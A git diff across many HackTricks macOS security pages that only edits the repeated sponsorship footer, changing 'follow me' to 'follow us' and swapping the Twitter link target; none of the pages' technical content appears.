+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -75,7 +75,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
index 0cc5888cd..7ef0a634a 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -194,7 +194,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
index 031937255..2026a9640 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -320,7 +320,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md b/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
index 9f81afa95..fbbcd1da3 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -176,7 +176,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md b/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
index 7ae0cb03c..8c2e83398 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -265,7 +265,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
index 61d2a1b73..162deba96 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -137,7 +137,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
index 8c91fa295..505c5ce15 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -80,7 +80,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
index 386fe732b..40575328c 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -299,7 +299,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
index 2380ff5bf..8c69040b6 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -195,7 +195,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
index 19163cb9d..1038e82d3 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -95,7 +95,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md b/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
index 3d9ed3fa2..7f8555316 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -145,7 +145,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
index 4f624f0bf..b996af4e6 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -49,7 +49,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-useful-commands.md b/macos-hardening/macos-useful-commands.md
index 575b27595..539a5e72c 100644
--- a/macos-hardening/macos-useful-commands.md
+++ b/macos-hardening/macos-useful-commands.md
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
